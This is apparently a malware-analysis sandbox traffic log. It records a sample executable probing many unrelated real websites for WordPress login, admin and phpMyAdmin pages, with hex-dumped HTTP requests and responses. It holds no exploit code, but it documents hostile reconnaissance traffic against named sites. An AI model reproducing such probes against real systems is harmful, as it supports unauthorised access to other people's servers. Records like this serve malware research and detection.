                                                                                                                                                                                                    2023-11-26 06:00:02 UTC204INData Raw: 48 54 54 50 2f 31 2e 31 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 36 3a 30 30 3a 30 32 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 36 32 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 4c 6f 63 61 74 69 6f 6e 3a 20 68 74 74 70 73 3a 2f 2f 77 77 77 2e 72 65 63 68 61 67 72 69 63 6f 6c 61 2e 63 6f 6d 2e 62 72 2f 77 70 2d 61 64 6d 69 6e 2f 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 301 Moved PermanentlyServer: nginxDate: Sun, 26 Nov 2023 06:00:02 GMTContent-Type: text/htmlContent-Length: 162Connection: closeLocation: https://www.rechagricola.com.br/wp-admin/
                                                                                                                                                                                                    2023-11-26 06:00:02 UTC162INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                    Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    592192.168.2.456815185.135.132.1054436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 06:00:02 UTC172OUTGET /admin HTTP/1.1
                                                                                                                                                                                                    Host: www.grantstech.io
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 06:00:02 UTC301INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 36 3a 30 30 3a 30 32 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6d 61 78 2d 61 67 65 3d 30 0d 0a 45 78 70 69 72 65 73 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 36 3a 30 30 3a 30 32 20 47 4d 54 0d 0a 56 61 72 79 3a 20 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 0d 0a 58 2d 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 4d 49 53 53 0d 0a 58 2d 43
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 200 OKDate: Sun, 26 Nov 2023 06:00:02 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=0Expires: Sun, 26 Nov 2023 06:00:02 GMTVary: Accept-EncodingX-Cache-Status: MISSX-C
                                                                                                                                                                                                    2023-11-26 06:00:02 UTC634INData Raw: 32 36 65 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 30 30 30 30 30 30 22 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 64 65 73 63 72 69
                                                                                                                                                                                                    Data Ascii: 26e<!doctype html><html lang="en"><head><meta charset="utf-8"/><link rel="icon" href="/favicon.ico"/><meta name="viewport" content="width=device-width,initial-scale=1"/><meta name="theme-color" content="#000000"/><meta name="description" content="descri


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    593192.168.2.456828144.202.62.1314436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 06:00:02 UTC182OUTGET /wp-login.php HTTP/1.1
                                                                                                                                                                                                    Host: gruporegiosafety.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 06:00:03 UTC352INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 36 3a 30 30 3a 30 32 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 0d 0a 45 78 70 69 72 65 73 3a 20 57 65 64 2c 20 31 31 20 4a 61 6e 20 31 39 38 34 20 30 35 3a 30 30 3a 30 30 20 47 4d 54 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 2c 20 6d 61 78 2d 61 67 65 3d 30 0d 0a 58 2d 46 72 61 6d 65 2d 4f 70 74 69 6f 6e 73 3a 20 53 41 4d 45 4f 52 49 47 49 4e 0d 0a 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 77 6f 72 64 70 72 65 73 73 5f 74 65 73 74 5f 63 6f 6f 6b 69 65 3d 57 50 25 32 30 43 6f 6f 6b 69 65 25 32 30 63 68 65 63 6b 3b 20 70 61 74 68 3d 2f 3b 20
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 200 OKDate: Sun, 26 Nov 2023 06:00:02 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0X-Frame-Options: SAMEORIGINSet-Cookie: wordpress_test_cookie=WP%20Cookie%20check; path=/;
                                                                                                                                                                                                    2023-11-26 06:00:03 UTC7840INData Raw: 32 38 32 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 09 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 73 2d 4d 58 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 74 69 74 6c 65 3e 41 63 63 65 64 65 72 20 26 6c 73 61 71 75 6f 3b 20 47 52 55 50 4f 20 52 45 47 49 4f 20 53 41 46 45 54 59 20 26 23 38 32 31 32 3b 20 57 6f 72 64 50 72 65 73 73 3c 2f 74 69 74 6c 65 3e 0a 09 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 2e 6c 6f 67 69 6e 2d 61 63 74 69 6f 6e 2d 6c 6f 73 74 70 61 73 73 77 6f 72 64 20 23 6c 6f 67 69 6e 5f 65 72 72 6f 72 7b 0a 20 20
                                                                                                                                                                                                    Data Ascii: 282a<!DOCTYPE html><html lang="es-MX"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><title>Acceder &lsaquo; GRUPO REGIO SAFETY &#8212; WordPress</title> <style> .login-action-lostpassword #login_error{
                                                                                                                                                                                                    2023-11-26 06:00:03 UTC2448INData Raw: 20 25 32 24 73 21 20 55 73 65 20 25 33 24 73 20 69 6e 73 74 65 61 64 2e 20 50 6c 65 61 73 65 20 63 6f 6e 73 69 64 65 72 20 77 72 69 74 69 6e 67 20 6d 6f 72 65 20 69 6e 63 6c 75 73 69 76 65 20 63 6f 64 65 2e 22 3a 5b 22 5c 75 30 30 61 31 25 31 24 73 20 65 73 74 5c 75 30 30 65 31 20 65 6e 20 64 65 73 75 73 6f 20 64 65 73 64 65 20 6c 61 20 76 65 72 73 69 5c 75 30 30 66 33 6e 20 25 32 24 73 21 20 55 73 61 20 25 33 24 73 20 65 6e 20 73 75 20 6c 75 67 61 72 2e 20 50 6f 72 20 66 61 76 6f 72 20 63 6f 6e 73 69 64 65 72 61 20 65 73 63 72 69 62 69 72 20 75 6e 20 63 5c 75 30 30 66 33 64 69 67 6f 20 6d 5c 75 30 30 65 31 73 20 69 6e 63 6c 75 73 69 76 6f 2e 22 5d 7d 7d 2c 22 63 6f 6d 6d 65 6e 74 22 3a 7b 22 72 65 66 65 72 65 6e 63 65 22 3a 22 77 70 2d 61 64 6d 69 6e 5c
                                                                                                                                                                                                    Data Ascii: %2$s! Use %3$s instead. Please consider writing more inclusive code.":["\u00a1%1$s est\u00e1 en desuso desde la versi\u00f3n %2$s! Usa %3$s en su lugar. Por favor considera escribir un c\u00f3digo m\u00e1s inclusivo."]}},"comment":{"reference":"wp-admin\
                                                                                                                                                                                                    2023-11-26 06:00:03 UTC2INData Raw: 0d 0a
                                                                                                                                                                                                    Data Ascii:
                                                                                                                                                                                                    2023-11-26 06:00:03 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    594192.168.2.456848213.0.13.444436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 06:00:02 UTC184OUTGET /wp/wp-login.php HTTP/1.1
                                                                                                                                                                                                    Host: www.ceuandalucia.es
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 06:00:03 UTC542INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 36 3a 30 30 3a 30 32 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 0d 0a 58 2d 50 6f 77 65 72 65 64 2d 42 79 3a 20 50 48 50 2f 35 2e 34 2e 34 35 2d 30 2b 64 65 62 37 75 31 34 0d 0a 45 78 70 69 72 65 73 3a 20 57 65 64 2c 20 31 31 20 4a 61 6e 20 31 39 38 34 20 30 35 3a 30 30 3a 30 30 20 47 4d 54 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 2c 20 6d 61 78 2d 61 67 65 3d 30 0d 0a 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 77 6f 72 64 70 72 65 73 73 5f 74 65 73 74 5f 63 6f 6f 6b 69 65 3d 57 50 2b 43 6f 6f 6b 69 65 2b 63 68 65 63 6b 3b 20 70 61 74 68 3d
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 200 OKDate: Sun, 26 Nov 2023 06:00:02 GMTServer: ApacheX-Powered-By: PHP/5.4.45-0+deb7u14Expires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Set-Cookie: wordpress_test_cookie=WP+Cookie+check; path=
                                                                                                                                                                                                    2023-11-26 06:00:03 UTC6439INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 09 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 0a 09 09 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 63 6c 61 73 73 3d 22 69 65 38 22 20 6c 61 6e 67 3d 22 65 73 22 20 78 6d 6c 6e 73 3a 6f 67 3d 22 68 74 74 70 3a 2f 2f 6f 70 65 6e 67 72 61 70 68 70 72 6f 74 6f 63 6f 6c 2e 6f 72 67 2f 73 63 68 65 6d 61 2f 22 20 78 6d 6c 6e 73 3a 66 62 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 2f 32 30 30 38 2f 66 62 6d 6c 22 3e 0a 09 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 09 3c 21 2d 2d 5b 69 66 20 21 28 49 45 20 38 29 20 5d 3e 3c 21 2d 2d 3e 0a 09 09 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77
                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html>...[if IE 8]><html xmlns="http://www.w3.org/1999/xhtml" class="ie8" lang="es" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml"><![endif]-->...[if !(IE 8) ]>...><html xmlns="http://w


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    595192.168.2.456820120.88.73.2384436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 06:00:02 UTC253OUTGET /saml/index.php?page=%2FPhpMyAdmin%2F HTTP/1.1
                                                                                                                                                                                                    Host: my.calvary.qld.edu.au
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    Cookie: PHPSESSID=gh3fodnktlcg4ei2n3go2sr3u6
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 06:00:03 UTC1069INData Raw: 48 54 54 50 2f 31 2e 31 20 33 30 32 20 46 6f 75 6e 64 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 36 3a 30 30 3a 30 33 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 45 78 70 69 72 65 73 3a 20 54 68 75 2c 20 31 39 20 4e 6f 76 20 31 39 38 31 20 30 38 3a 35 32 3a 30 30 20 47 4d 54 0d 0a 50 72 61 67 6d 61 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 302 FoundServer: nginxDate: Sun, 26 Nov 2023 06:00:03 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeExpires: Thu, 19 Nov 1981 08:52:00 GMTPragma: no-cacheCache-Control: no-cache, must-revalida
                                                                                                                                                                                                    2023-11-26 06:00:03 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    596192.168.2.456884194.47.252.1154436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 06:00:02 UTC240OUTGET / HTTP/1.1
                                                                                                                                                                                                    Host: www.maxiv.lu.se
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    Cookie: ff59ae34f86788aafc83adbd6fbb16ab=573a080441b430e46540f849b8105044
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 06:00:04 UTC484INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 64 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 36 3a 30 30 3a 30 33 20 47 4d 54 0d 0a 73 65 72 76 65 72 3a 20 41 70 61 63 68 65 2f 32 2e 34 2e 35 37 20 28 44 65 62 69 61 6e 29 0d 0a 78 2d 70 6f 77 65 72 65 64 2d 62 79 3a 20 50 48 50 2f 38 2e 32 2e 31 32 0d 0a 6c 69 6e 6b 3a 20 3c 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6d 61 78 69 76 2e 6c 75 2e 73 65 2f 77 70 2d 6a 73 6f 6e 2f 3e 3b 20 72 65 6c 3d 22 68 74 74 70 73 3a 2f 2f 61 70 69 2e 77 2e 6f 72 67 2f 22 0d 0a 6c 69 6e 6b 3a 20 3c 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6d 61 78 69 76 2e 6c 75 2e 73 65 2f 77 70 2d 6a 73 6f 6e 2f 77 70 2f 76 32 2f 70 61 67 65 73 2f 32 38 3e 3b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 3b 20 74 79
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 200 OKdate: Sun, 26 Nov 2023 06:00:03 GMTserver: Apache/2.4.57 (Debian)x-powered-by: PHP/8.2.12link: <https://www.maxiv.lu.se/wp-json/>; rel="https://api.w.org/"link: <https://www.maxiv.lu.se/wp-json/wp/v2/pages/28>; rel="alternate"; ty
                                                                                                                                                                                                    2023-11-26 06:00:04 UTC14768INData Raw: 33 39 41 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0a 09 3c 74 69 74 6c 65 3e 4d 41 58 20 49 56 20 26 23 38 32 31 31 3b 20 57 65 20 6d 61 6b 65 20 74 68 65 20 69 6e 76 69 73 69 62
                                                                                                                                                                                                    Data Ascii: 39A8<!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"><link rel="profile" href="http://gmpg.org/xfn/11"><title>MAX IV &#8211; We make the invisib
                                                                                                                                                                                                    2023-11-26 06:00:04 UTC1104INData Raw: 34 34 39 0d 0a 6c 6f 75 72 22 3a 22 23 33 33 33 33 33 33 22 2c 22 62 75 74 74 6f 6e 5f 34 5f 61 73 5f 62 75 74 74 6f 6e 22 3a 22 31 22 2c 22 62 75 74 74 6f 6e 5f 37 5f 62 75 74 74 6f 6e 5f 63 6f 6c 6f 75 72 22 3a 22 23 36 31 61 32 32 39 22 2c 22 62 75 74 74 6f 6e 5f 37 5f 62 75 74 74 6f 6e 5f 68 6f 76 65 72 22 3a 22 23 34 65 38 32 32 31 22 2c 22 62 75 74 74 6f 6e 5f 37 5f 6c 69 6e 6b 5f 63 6f 6c 6f 75 72 22 3a 22 23 66 66 66 22 2c 22 62 75 74 74 6f 6e 5f 37 5f 61 73 5f 62 75 74 74 6f 6e 22 3a 22 31 22 2c 22 62 75 74 74 6f 6e 5f 37 5f 6e 65 77 5f 77 69 6e 22 3a 22 22 2c 22 66 6f 6e 74 5f 66 61 6d 69 6c 79 22 3a 22 69 6e 68 65 72 69 74 22 2c 22 68 65 61 64 65 72 5f 66 69 78 22 3a 22 22 2c 22 6e 6f 74 69 66 79 5f 61 6e 69 6d 61 74 65 5f 68 69 64 65 22 3a 22
                                                                                                                                                                                                    Data Ascii: 449lour":"#333333","button_4_as_button":"1","button_7_button_colour":"#61a229","button_7_button_hover":"#4e8221","button_7_link_colour":"#fff","button_7_as_button":"1","button_7_new_win":"","font_family":"inherit","header_fix":"","notify_animate_hide":"
                                                                                                                                                                                                    2023-11-26 06:00:04 UTC10639INData Raw: 32 39 38 37 0d 0a 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6d 61 78 69 76 2e 6c 75 2e 73 65 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 70 6c 75 67 69 6e 73 2f 73 68 61 72 65 70 6f 69 6e 74 2d 70 6c 75 67 69 6e 2f 64 69 73 74 2f 6a 73 74 72 65 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 33 2e 33 2e 35 22 20 69 64 3d 22 73 68 61 72 65 70 6f 69 6e 74 5f 73 63 72 69 70 74 73 5f 63 6f 72 65 2d 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6d 61 78 69 76 2e 6c 75 2e 73 65 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 70 6c 75 67 69 6e 73 2f 73 68 61 72 65 70 6f 69 6e 74 2d 70 6c 75 67 69 6e 2f 6a 73 2f 73
                                                                                                                                                                                                    Data Ascii: 2987xt/javascript"></script><script src="https://www.maxiv.lu.se/wp-content/plugins/sharepoint-plugin/dist/jstree.min.js?ver=3.3.5" id="sharepoint_scripts_core-js"></script><script src="https://www.maxiv.lu.se/wp-content/plugins/sharepoint-plugin/js/s
                                                                                                                                                                                                    2023-11-26 06:00:04 UTC16314INData Raw: 33 46 42 32 0d 0a 63 2d 34 32 2e 39 2d 38 2e 35 36 2d 38 33 2e 31 36 2d 32 35 2e 32 35 2d 31 31 39 2e 36 37 2d 34 39 2e 36 6c 2d 37 2e 32 35 2d 34 2e 38 33 2d 35 31 2e 36 36 20 32 35 2e 38 37 2d 35 35 2e 34 31 2d 35 35 2e 34 31 20 32 35 2e 38 37 2d 35 31 2e 36 36 2d 34 2e 38 33 2d 37 2e 32 35 63 2d 32 34 2e 33 35 2d 33 36 2e 35 31 2d 34 31 2e 30 33 2d 37 36 2e 37 37 2d 34 39 2e 36 2d 31 31 39 2e 36 37 6c 2d 31 2e 37 31 2d 38 2e 35 35 4c 31 31 35 20 34 38 39 2e 31 38 76 2d 37 38 2e 33 36 6c 35 34 2e 37 39 2d 31 38 2e 32 33 20 31 2e 37 31 2d 38 2e 35 35 63 38 2e 35 36 2d 34 32 2e 39 20 32 35 2e 32 35 2d 38 33 2e 31 36 20 34 39 2e 36 2d 31 31 39 2e 36 37 6c 34 2e 38 33 2d 37 2e 32 35 2d 32 35 2e 38 37 2d 35 31 2e 36 36 20 35 35 2e 34 31 2d 35 35 2e 34 31 20
                                                                                                                                                                                                    Data Ascii: 3FB2c-42.9-8.56-83.16-25.25-119.67-49.6l-7.25-4.83-51.66 25.87-55.41-55.41 25.87-51.66-4.83-7.25c-24.35-36.51-41.03-76.77-49.6-119.67l-1.71-8.55L115 489.18v-78.36l54.79-18.23 1.71-8.55c8.56-42.9 25.25-83.16 49.6-119.67l4.83-7.25-25.87-51.66 55.41-55.41
                                                                                                                                                                                                    2023-11-26 06:00:04 UTC16312INData Raw: 33 46 42 30 0d 0a 22 3e 42 41 47 20 41 63 63 65 73 73 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 20 63 6c 61 73 73 3d 27 6d 65 6e 75 2d 69 74 65 6d 20 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 70 6f 73 74 5f 74 79 70 65 20 6d 65 6e 75 2d 69 74 65 6d 2d 6f 62 6a 65 63 74 2d 70 61 67 65 20 69 74 65 6d 2d 64 65 70 74 68 2d 33 27 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6d 61 78 69 76 2e 6c 75 2e 73 65 2f 3f 70 61 67 65 5f 69 64 3d 35 36 34 39 38 22 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 69 74 65 6d 2d 6c 61 62 65 6c 22 3e 46 61 73 74 20 41 63 63 65 73 73 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 20 63 6c 61 73 73 3d 27 6d 65 6e 75 2d 69 74 65 6d 20 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 70 6f 73 74 5f 74 79 70 65 20 6d 65 6e 75 2d 69 74
                                                                                                                                                                                                    Data Ascii: 3FB0">BAG Access</a></li><li class='menu-item menu-item-type-post_type menu-item-object-page item-depth-3'><a href="https://www.maxiv.lu.se/?page_id=56498" class="menu-item-label">Fast Access</a></li><li class='menu-item menu-item-type-post_type menu-it
                                                                                                                                                                                                    2023-11-26 06:00:04 UTC30INData Raw: 34 32 0d 0a 63 6f 6e 73 2d 73 68 61 72 70 22 3e 61 64 64 3c 2f 73 70 61 6e 3e 3c 2f 73 70
                                                                                                                                                                                                    Data Ascii: 42cons-sharp">add</span></sp
                                                                                                                                                                                                    2023-11-26 06:00:04 UTC42INData Raw: 61 6e 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 6d 61 74 65 72 69 61 6c 2d 69 63 6f 6e 20 73 75 62 6d 65 6e 75 2d 74 6f 0d 0a
                                                                                                                                                                                                    Data Ascii: an><span class="material-icon submenu-to
